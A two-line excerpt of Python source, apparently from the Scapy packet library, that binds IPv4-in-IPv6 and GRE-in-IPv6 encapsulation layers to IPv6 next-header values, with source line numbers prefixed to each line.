4235bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) 

4236bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)